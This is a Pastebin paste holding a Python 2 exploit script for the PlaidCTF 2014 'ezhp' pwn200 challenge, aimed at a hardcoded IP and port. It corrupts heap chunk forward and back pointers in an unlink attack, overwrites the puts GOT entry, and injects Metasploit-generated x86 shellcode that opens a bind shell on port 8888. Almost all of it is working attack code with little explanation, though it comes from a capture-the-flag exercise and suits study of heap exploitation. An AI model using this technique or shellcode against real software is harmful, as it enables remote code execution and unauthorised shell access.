SHARE
TWEET

pwn200 ezhp by Danux

a guest Apr 15th, 2014 244 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Author: Danux Mitnick
  2. #Description: Pwn200 PlaidCTF 2014
  3. #Date: Apr 13th 2014
  4.  
  5. import socket, time, struct
  6.  
  7. def sock_recv(s, n):
  8.   time.sleep(0.25)
  9.   b = s.recv(n)
  10.   print b
  11.   return b
  12.  
  13. def DoData(s, data):
  14.   s.send(data)
  15.   b = sock_recv(s,8096)
  16.  
  17. def DoRun(s,n):
  18.   s.send('%d\n'%n)
  19.   b = sock_recv(s, 1024)
  20.   return b
  21.  
  22. s = socket.socket()
  23. s.connect(('54.81.149.239', 9174))#54.81.149.239:9174
  24. raw_input('Attach process with gdb here')
  25. b = sock_recv(s, 1024)
  26.  
  27. DoRun(s,1) #id 0
  28. DoRun(s,256)
  29. DoRun(s,1) #id 1
  30. DoRun(s,256)
  31. DoRun(s,1) #id 2
  32. DoRun(s,256)
  33. DoRun(s,3) #change note
  34. DoRun(s,1) #id 1
  35. DoRun(s,276)
  36. #Now input your dataa
  37. sizes = "\xfc\xff\xff\xff"*2
  38. fd = "\x08\xa0\x04\x08" # readelf --relocs ezhp ->0804a008 puts
  39. bk = "\x60\xa0\x04\x08" #chunk_buffers holding heap addresses
  40. sc = 'A'*260 + sizes + fd + bk
  41. DoData(s,sc) #overwrite fd and bd headers of chunk id 2
  42. DoRun(s,2) #id 2 - delete note of corrupted heap
  43. DoRun(s,2)
  44. DoRun(s,3) #change note
  45. DoRun(s,1) #id 1 -> Now is pointing to heap addresses buffer
  46. DoRun(s,256) #size
  47. #Now input your data
  48. sc = '\x0C\xa0\x04\x08' + "\x90"*10
  49. #msfpayload linux/x86/shell_bind_tcp LPORT=8888 P
  50. sc2 =(
  51. "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
  52. "\x80\x5b\x5e\x52\x68\x02\x00\x22\xb8\x6a\x10\x51\x50\x89"
  53. "\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd"
  54. "\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49"
  55. "\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
  56. "\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
  57. )
  58. sc = sc + sc2
  59.  
  60. DoData(s,sc) #overwrite stack at 0804a008 - 0x114  - puts
  61. DoRun(s,4) #id 1 - print note 1 which is pointing to overwriten put address
  62. DoRun(s,1)
  63.  
  64. "pwn200.py" 65L, 1706C                                                                                                                                                                                                     1,4           Top
RAW Paste Data
Top